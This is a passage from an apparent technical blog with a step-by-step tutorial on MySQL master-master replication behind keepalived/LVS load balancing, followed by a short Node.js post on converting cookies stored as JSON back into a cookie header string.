    mysql> show master status;
    +------------------+----------+--------------+------------------+
    | File             | Position | Binlog_Do_DB | Binlog_Ignore_DB |
    +------------------+----------+--------------+------------------+
    | mysql-bin.000010 |     1193 | mydatabase   |   mysql,test     |
    +------------------+----------+--------------+------------------+
    
  7. Then in the MySQL console, add a new grant for replication.

    mysql> grant replication slave on *.* to 'replication'@'%' identified by 'your_replication_password';
    
  8. On the NEW MySQL server, import the MySQL dump we got from the running MySQL server: $ mysql -u <youruser> -p mydatabase < database_dump.sql
  9. On the NEW MySQL server, back up a copy of my.cnf: $ sudo cp /etc/mysql/my.cnf /etc/mysql/my.cnf.orig
  10. Edit /etc/mysql/my.cnf on the new MySQL server with the following under [mysqld] and save the file.

    bind-address  = 0.0.0.0
    log-bin = /var/log/mysql/mysql-bin.log
    binlog-do-db=mydatabase # this is the database we will replicate
    binlog-ignore-db=mysql
    binlog-ignore-db=test
    server-id = 2 # id is different than the CURRENT MySQL server
    
  11. Restart the MySQL on the New server.

  12. Go to the new MySQL server's (192.168.1.11) console; we will sync this new MySQL server with the current one (IMPORTANT! YOU NEED TO SET THE MASTER_LOG_FILE and MASTER_LOG_POS ACCORDING TO THE CURRENT RUNNING SERVER'S File and Position VALUES OR IT WILL NOT BE IN SYNC):

    mysql> STOP SLAVE;
    mysql> CHANGE MASTER TO MASTER_HOST='192.168.1.10', MASTER_USER='replication', MASTER_PASSWORD='your_replication_password', MASTER_LOG_FILE='<the File value from running server>', MASTER_LOG_POS=<the Position value from the running server>;
    mysql> START SLAVE;
    
  13. Check the Status on the New MySQL server:

    mysql> SHOW SLAVE STATUS\G
    
  14. Make sure these two values are set to 'Yes', the state shows waiting for the master to send events, and there are NO ERRORS:

    Slave_IO_State: Waiting for master to send event
    Slave_IO_Running: Yes
    Slave_SQL_Running: Yes
    
  15. On the NEW MySQL server, run the following command: mysql> grant replication slave on *.* to 'replication'@'%' identified by 'your_replication_password';
  16. Then in the NEW MySQL server's console, type in: mysql> SHOW MASTER STATUS;
  17. Take note of the File and Position values from the above command on the NEW MySQL server.

  18. On the CURRENT running MySQL server (192.168.1.10), we will sync up with the NEW MySQL server (IMPORTANT! YOU NEED TO SET THE MASTER_LOG_FILE and MASTER_LOG_POS ACCORDING TO THE NEW SERVER'S File and Position VALUES OR IT WILL NOT BE IN SYNC):

    mysql> STOP SLAVE;
    mysql> CHANGE MASTER TO MASTER_HOST='192.168.1.11', MASTER_USER='replication', MASTER_PASSWORD='your_replication_password', MASTER_LOG_FILE='<the File value from NEW server>', MASTER_LOG_POS=<the Position value from the NEW server>;
    mysql> START SLAVE;
    
  19. Check the status on the CURRENT running server: mysql> SHOW SLAVE STATUS\G
  20. Make sure these two values are set to 'Yes', the state shows waiting for the master to send events, and there are NO errors:

    Slave_IO_State: Waiting for master to send event
    Slave_IO_Running: Yes
    Slave_SQL_Running: Yes
    
  21. GRANT privileges for normal database access for the web app on the NEW server. Example:

    mysql> GRANT ALL PRIVILEGES ON mydatabase.* to '<the db user>'@'<the web app server IP>' IDENTIFIED BY '<the password for the db user>';
    mysql> FLUSH PRIVILEGES;
    

LVS (KeepaliveD)

We will need two servers (each can be a low-spec server with 2 cores and at least 2GB of RAM) which will be used for network high availability and load balancing.

Assuming the IP addresses are as follows:

MASTER LVS: 192.168.1.20
BACKUP LVS: 192.168.1.21
CURRENT MYSQL SERVER: 192.168.1.10
NEW MYSQL SERVER: 192.168.1.11
Virtual (floating) IP - no need to configure this on any server's interfaces, it will be managed by keepalived: 192.168.1.30

Change the IP in the configuration according to your infrastructure setup!

On both the MASTER and BACKUP LVS servers, download and install keepalived and ipvsadm: $ sudo apt-get install keepalived ipvsadm

Add this configuration to MASTER LVS (192.168.1.20) in /etc/keepalived/keepalived.conf:

global_defs {
    router_id LVS_MYPROJECT
}
vrrp_instance VI_1 {
    state MASTER
    # monitored interface
    interface eth0
    # virtual router's ID
    virtual_router_id 51
    # set priority (change this value on each server)
    # (large number means priority is high)
    priority 101
    nopreempt
    # VRRP sending interval
    advert_int 1
    # authentication info between Keepalived servers
    authentication {
        auth_type PASS
        auth_pass mypassword
    }

    virtual_ipaddress {
        # virtual IP address
        192.168.1.30 dev eth0
    }
}
virtual_server 192.168.1.30 3306 {
    # monitored interval
    delay_loop 3
    # distribution method
    lvs_sched rr
    # routing method
    lvs_method DR
    protocol TCP

    # backend server#1
    real_server 192.168.1.10 3306 {
        weight 1
        TCP_CHECK {
        connect_timeout 10
        nb_get_retry 3
        delay_before_retry 3
        connect_port 3306
        }
    }

    # backend server#2
    real_server 192.168.1.11 3306 {
        weight 1
        TCP_CHECK {
        connect_timeout 10
        nb_get_retry 3
        delay_before_retry 3
        connect_port 3306
        }
    }
}

Add this configuration to BACKUP LVS (192.168.1.21) in /etc/keepalived/keepalived.conf:

global_defs {
    router_id LVS_MYPROJECT
}
vrrp_instance VI_1 {
    state BACKUP
    # monitored interface
    interface eth0
    # virtual router's ID
    virtual_router_id 51
    # set priority (change this value on each server)
    # (large number means priority is high)
    priority 100
    nopreempt
    # VRRP sending interval
    advert_int 1
    # authentication info between Keepalived servers
    authentication {
        auth_type PASS
        auth_pass mypassword
    }

    virtual_ipaddress {
        # virtual IP address
        192.168.1.30 dev eth0
    }
}
virtual_server 192.168.1.30 3306 {
    # monitored interval
    delay_loop 3
    # distribution method
    lvs_sched rr
    # routing method
    lvs_method DR
    protocol TCP

    # backend server#1
    real_server 192.168.1.10 3306 {
        weight 1
        TCP_CHECK {
        connect_timeout 10
        nb_get_retry 3
        delay_before_retry 3
        connect_port 3306
        }
    }
    # backend server#2
    real_server 192.168.1.11 3306 {
        weight 1
        TCP_CHECK {
        connect_timeout 10
        nb_get_retry 3
        delay_before_retry 3
        connect_port 3306
        }
    }
}

Lastly, start the keepalived service on both the MASTER and BACKUP LVS: $ sudo service keepalived start

Final setup

In this final setup, we will configure the web app to use keepalived's virtual IP (192.168.1.30) and create a firewall rule on both MySQL DATABASE SERVERS (NOT the LVS servers).

  1. $ sudo iptables -t nat -A PREROUTING -d 192.168.1.30 -j REDIRECT
  2. Edit /etc/rc.local on the MySQL database servers to make the firewall rule persistent:

    #!/bin/sh -e
    #
    # rc.local
    #
    # This script is executed at the end of each multiuser runlevel.
    # Make sure that the script will "exit 0" on success or any other
    # value on error.
    #
    # In order to enable or disable this script just change the execution
    # bits.
    #
    # By default this script does nothing.
    /sbin/iptables -t nat -A PREROUTING -d 192.168.1.30 -j REDIRECT
    exit 0
    
  3. $ chmod 755 /etc/rc.local
  4. Edit the .env file to use the virtual IP (in our setup: 192.168.1.30); see the connection sketch after these steps
  5. Start the Web Application
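
From the application's point of view nothing else changes: it connects to the virtual IP exactly as it would to a single MySQL server, and LVS forwards the TCP connection to whichever master is healthy. A minimal sketch using PyMySQL (the credentials are placeholders; use whatever client or ORM your web app already uses):

import time
import pymysql

def connect_via_vip(retries=5, delay=2):
    # The app only ever knows about the keepalived virtual IP (192.168.1.30).
    for attempt in range(retries):
        try:
            return pymysql.connect(host="192.168.1.30", user="the_db_user",
                                   password="the_password", database="mydatabase",
                                   connect_timeout=5)
        except pymysql.err.OperationalError:
            time.sleep(delay)  # brief retry while keepalived fails over
    raise RuntimeError("could not reach MySQL through the virtual IP")

conn = connect_via_vip()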

Notes

Make sure each MySQL server is shut down safely (e.g. shutdown -h now); do not perform a HARD shutdown/reset, as it will make the databases go out of sync with each other.

We can now shut down either one of the MySQL databases or one of the LVS servers, and the other will keep running.

Parsing cookies stored in JSON
Feb 2, 2017

Sometimes you will have to store cookie data, and you might store it as JSON with JSON.stringify.

How would you parse the cookies in JSON format back into a string separated by semicolons?

Here is how you would parse them back into a string (requires Node.js):

Assuming your cookie_file.txt contains the following:

[{"domain":".domain.com","httponly":false,"name":"presence","path":"/","secure":true,
  "value":"EDvF3EtimeF1486031553EuserFA2616400242A2EstateFDutF148asdasd1231235CEchFDp_5f616400242F3CC"},
  {"domain":".domain.com","httponly":false,"name":"p","path":"/","secure":false,"value":"-2"}]

The code to parse the cookies stored as JSON back into a string:

var fs = require('fs');

fs.readFile('./cookie_file.txt', function read(err, data){
   if (err) throw err;
   var cookies = JSON.parse(data);
   baked_cookies = [];
   cookies.forEach(function(cookie){
     var add_ingredients = cookie.name + '=' + cookie.value + ';';
     baked_cookies.push(add_ingredients);
   });

   baked_cookies = baked_cookies.join(' ').slice(0, -1);
   console.log(baked_cookies);
});

Assuming the above code is saved as cookie_parser.js, you can run it like this:

node cookie_parser.js

output: presence=EDvF3EtimeF1486031553EuserFA2616400242A2EstateFDutF148asdasd1231235CEchFDp_5f616400242F3CC; p=-2